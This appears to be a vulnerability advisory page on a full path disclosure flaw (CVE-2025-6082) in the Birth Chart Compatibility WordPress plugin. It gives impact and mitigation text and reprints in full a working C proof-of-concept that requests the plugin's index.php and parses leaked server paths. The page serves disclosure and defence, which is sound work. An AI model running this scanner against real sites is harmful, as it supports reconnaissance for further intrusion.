Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
AI Analysis
Technical Summary
The Birth Chart Compatibility WordPress Plugin version 2.0 suffers from a full path disclosure vulnerability. This type of vulnerability occurs when an application reveals the absolute file system path of the web server or application files in error messages or responses. Attackers can use this information to map the server's directory structure, identify the location of sensitive files, and tailor further attacks such as local file inclusion, remote code execution, or privilege escalation. The vulnerability affects the plugin's handling of certain requests or errors, causing it to leak the full path. The exploit code published on Exploit-DB is written in C, suggesting a standalone tool that can be used to automate the discovery of vulnerable installations. No specific affected versions are listed, but the reference to version 2.0 indicates that this version is vulnerable. No patches or fixes are currently linked, implying that users must seek updates or workarounds from the plugin developer or community. The vulnerability does not require authentication or user interaction, allowing remote attackers to exploit it easily. While the direct impact is limited to information disclosure, this can be a critical step in a multi-stage attack chain. Organizations using this plugin should be aware of the risk and monitor for suspicious activity.
Potential Impact
For European organizations, this vulnerability poses a moderate risk primarily through the exposure of sensitive server path information. While it does not directly allow code execution or data modification, the disclosed paths can facilitate more severe attacks by providing attackers with detailed knowledge of the server environment. This can lead to targeted exploitation attempts such as local file inclusion, directory traversal, or privilege escalation. Organizations operating WordPress sites with this plugin, especially those handling sensitive customer data or critical business functions, may face increased risk of data breaches or service disruptions if attackers leverage this information. The ease of exploitation without authentication increases the threat level, particularly for publicly accessible websites. Additionally, the presence of exploit code in C may enable attackers to integrate this vulnerability into automated scanning tools, increasing the likelihood of widespread probing and exploitation attempts. The impact is compounded in sectors with high regulatory requirements for data protection, such as finance, healthcare, and e-commerce, common across Europe.
Mitigation Recommendations
European organizations should immediately identify if their WordPress installations use the Birth Chart Compatibility Plugin version 2.0. If so, they should seek updates or patches from the plugin developer or community forums. In the absence of an official patch, consider disabling or removing the plugin to eliminate the vulnerability. Web application firewalls (WAFs) can be configured to detect and block requests that trigger the full path disclosure. Additionally, error handling should be hardened to prevent detailed error messages from being displayed to users, including disabling debug modes and customizing error responses. Regular security audits and vulnerability scanning should include checks for this specific vulnerability. Organizations should also monitor web server logs for unusual requests targeting the plugin endpoints. Employing least privilege principles on the web server and isolating WordPress instances can reduce the impact of potential follow-up attacks. Finally, educating web administrators about the risks of information disclosure vulnerabilities will help maintain vigilance.
Affected Countries
Germany, United Kingdom, France, Netherlands, Italy, Spain, Poland, Sweden
Indicators of Compromise
- exploit-code: /* * Exploit Title : Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure * Author : Byte Reaper * Telegram : @ByteReaper0 * CVE : CVE-2025-6082 * Software Link : https://frp.wordpress.org/plugins/birth-chart-compatibility/ * Description : Proof‑of‑Concept exploits the Full Path Disclosure bug in the * “Birth Chart Compatibility” WordPress plugin (<=v2.0). It sends * an HTTP GET request to the plugin’s index.php endpoint, captures * the resulting PHP warning or fatal error, and parses the server’s * filesystem path (e.g. “/var/www/html/wp-content/plugins/…” or * “C:\\xampp\\htdocs\\…”). Revealing this path aids attackers in * chaining further LFI/RCE or reconnaissance attacks. */ #include<stdio.h> #include"argparse.h" #include<string.h> #include <stdlib.h> #include <curl/curl.h> #include <unistd.h> #define FULL 2300 const char *url = NULL; const char *cookies=NULL; int selecetCookie = 0; int verbose = 0; void exitSyscall() { __asm__ volatile ( "xor %%rdi, %%rdi\n\t" "mov $0x3C, %%rax\n\t" "syscall\n\t" : : :"rax", "rdi" ); } const char *keyFound[] = { "Warning:", "Fatal error:", "/var/www/", "C:\\xampp\\" }; struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (tmp == NULL) { printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n"); exitSyscall(); } m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } void showPath(const char *targetUrl) { char full[FULL]; CURLcode curlCode; struct Mem response = {NULL, 0}; CURL *curl = curl_easy_init(); if (curl == NULL) { exitSyscall(); } response.buffer = NULL; response.len = 0; if (verbose) { printf("==========================================\e[0m\n"); printf("[+] Cleaning Response...\e[0m\n"); printf("[+] Response Buffer : %s\e[0m\n", response.buffer); printf("[+] Response Len : %zu\e[0m\n", response.len); printf("==========================================\e[0m\n"); } fflush(stdout); if (curl) { snprintf(full, sizeof(full), "%s/wp-content/plugins/birth-chart-compatibility/index.php", targetUrl); curl_easy_setopt(curl, CURLOPT_URL, full); if (selecetCookie) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } curl_easy_setopt(curl, CURLOPT_ACCEPT_ENCODING, ""); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); sleep(1); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); if (verbose) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } struct curl_slist *h = NULL; h = curl_slist_append(h, "Accept: text/html"); h = curl_slist_append(h, "Accept-Encoding: gzip"); h = curl_slist_append(h, "Accept-Language: en-US,en"); h = curl_slist_append(h, "Connection: keep-alive"); h = curl_slist_append(h, "Referer: http://example.com"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h); long httpCode = 0; curlCode = curl_easy_perform(curl); if (curlCode == CURLE_OK) { printf("---------------------------------------------------------------------------------------\n"); printf("\e[1;36m[+] Request sent successfully\e[0m\n"); printf("\e[1;33m[+] Input Url : %s\e[0m\n", targetUrl); printf("\e[1;33m[+] Full Format Url : %s\e[0m\n",full); curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode); int numberKey = sizeof(keyFound) / sizeof(keyFound[0]); if (httpCode >= 200 && httpCode < 300) { printf("[+] Http Code (200 < 300) !\e[0m\n"); printf("\e[1;32m[+] Http Code : %ld\e[0m\n", httpCode); printf("\e[1;35m====================================[Response]====================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len); printf("\e[1;35m===================================================================================\e[0m\n\n"); for (int k = 0; k < numberKey; k++) { const char *found = strstr(response.buffer, keyFound[k]); if (found) { printf("\e[1;34m[+] Keyword found: %s\e[0m\n", keyFound[k]); printf("\e[1;34m[+] Context: %.100s\e[0m\n", found); } } } else { printf("\e[1;31m[-] Http Code : %ld\e[0m\n", httpCode); printf("\e[1;31m[-] Please Check Your input Path !\e[0m\n"); printf("\e[1;31m[-] Or Connection in Tragte : (%s)\e[0m\n", targetUrl); if (verbose) { printf("\e[1;35m====================================[Response]====================================\n"); printf("%s\n", response.buffer); printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len); printf("\e[1;35m===================================================================================\n\n"); } } } else { printf("\e[1;31m[-] The request was not sent !\e[0m\n"); if (verbose) { printf("\e[1;31m[-] Exit Syscall ...\e[0m\n"); } printf("\e[1;31m[-] Error : %s\n", curl_easy_strerror(curlCode)); exitSyscall(); } } if (response.buffer) { free(response.buffer); response.buffer = NULL; response.len = 0; } curl_easy_cleanup(curl); } int main(int argc, const char **argv) { printf ( "\e[1;91m" "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖ \n" "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▙▖▛▌▙▌▄▌ \n" "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▙▌█▌▙▌▙▖ \n" "\e[1;97m\t Byte Reaper\e[0m\n" ); printf("\e[1;91m---------------------------------------------------------------------------------------\e[0m\n"); int loop = 0; struct argparse_option options[] = { OPT_HELP(), OPT_STRING('u', "url", &url, "Target Url (Base Url)"), OPT_STRING('c', "cookies", &cookies, "cookies File"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"), OPT_INTEGER('f', "loop", &loop, "For loop (Request) (Ex : -f 10)"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (!url) { printf("\e[1;31m[-] Please Enter Target Url !\e[0m\n"); printf("\e[1;31m[-] Ex : ./exploit -u https://target.com\e[0m\n"); exitSyscall(); } if (verbose) { verbose=1; } if (cookies) { selecetCookie = 1; } if (loop) { for (int o = 0; o < loop ; o++) { showPath(url); } } showPath(url); return 0; }
Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
Description
Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
AI-Powered Analysis
Technical Analysis
The Birth Chart Compatibility WordPress Plugin version 2.0 suffers from a full path disclosure vulnerability. This type of vulnerability occurs when an application reveals the absolute file system path of the web server or application files in error messages or responses. Attackers can use this information to map the server's directory structure, identify the location of sensitive files, and tailor further attacks such as local file inclusion, remote code execution, or privilege escalation. The vulnerability affects the plugin's handling of certain requests or errors, causing it to leak the full path. The exploit code published on Exploit-DB is written in C, suggesting a standalone tool that can be used to automate the discovery of vulnerable installations. No specific affected versions are listed, but the reference to version 2.0 indicates that this version is vulnerable. No patches or fixes are currently linked, implying that users must seek updates or workarounds from the plugin developer or community. The vulnerability does not require authentication or user interaction, allowing remote attackers to exploit it easily. While the direct impact is limited to information disclosure, this can be a critical step in a multi-stage attack chain. Organizations using this plugin should be aware of the risk and monitor for suspicious activity.
Potential Impact
For European organizations, this vulnerability poses a moderate risk primarily through the exposure of sensitive server path information. While it does not directly allow code execution or data modification, the disclosed paths can facilitate more severe attacks by providing attackers with detailed knowledge of the server environment. This can lead to targeted exploitation attempts such as local file inclusion, directory traversal, or privilege escalation. Organizations operating WordPress sites with this plugin, especially those handling sensitive customer data or critical business functions, may face increased risk of data breaches or service disruptions if attackers leverage this information. The ease of exploitation without authentication increases the threat level, particularly for publicly accessible websites. Additionally, the presence of exploit code in C may enable attackers to integrate this vulnerability into automated scanning tools, increasing the likelihood of widespread probing and exploitation attempts. The impact is compounded in sectors with high regulatory requirements for data protection, such as finance, healthcare, and e-commerce, common across Europe.
Mitigation Recommendations
European organizations should immediately identify if their WordPress installations use the Birth Chart Compatibility Plugin version 2.0. If so, they should seek updates or patches from the plugin developer or community forums. In the absence of an official patch, consider disabling or removing the plugin to eliminate the vulnerability. Web application firewalls (WAFs) can be configured to detect and block requests that trigger the full path disclosure. Additionally, error handling should be hardened to prevent detailed error messages from being displayed to users, including disabling debug modes and customizing error responses. Regular security audits and vulnerability scanning should include checks for this specific vulnerability. Organizations should also monitor web server logs for unusual requests targeting the plugin endpoints. Employing least privilege principles on the web server and isolating WordPress instances can reduce the impact of potential follow-up attacks. Finally, educating web administrators about the risks of information disclosure vulnerabilities will help maintain vigilance.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52419
- Has Exploit Code
- true
- Code Language
- c
Indicators of Compromise
Exploit Source Code
Exploit code for Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
/* * Exploit Title : Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure * Author : Byte Reaper * Telegram : @ByteReaper0 * CVE : CVE-2025-6082 * Software Link : https://frp.wordpress.org/plugins/birth-chart-compatibility/ * Description : Proof‑of‑Concept exploits the Full Path Disclosure bug in the * “Birth Chart Compatibility” WordPress plugin (<=v2.0). It sends * an HTTP GET request to the plugin’s index.php endpoint,... (8722 more characters)
Threat ID: 68ae5e7aad5a09ad005d88ca
Added to database: 8/27/2025, 1:25:14 AM
Last enriched: 10/11/2025, 1:01:14 AM
Last updated: 10/16/2025, 8:20:28 AM
Views: 75
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
Two New Windows Zero-Days Exploited in the Wild — One Affects Every Version Ever Shipped
MediumHackers Target ICTBroadcast Servers via Cookie Exploit to Gain Remote Shell Access
Highnpm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels
MediumWhat AI Reveals About Web Applications— and Why It Matters
LowNew Pixnapping Android Flaw Lets Rogue Apps Steal 2FA Codes Without Permissions
MediumActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.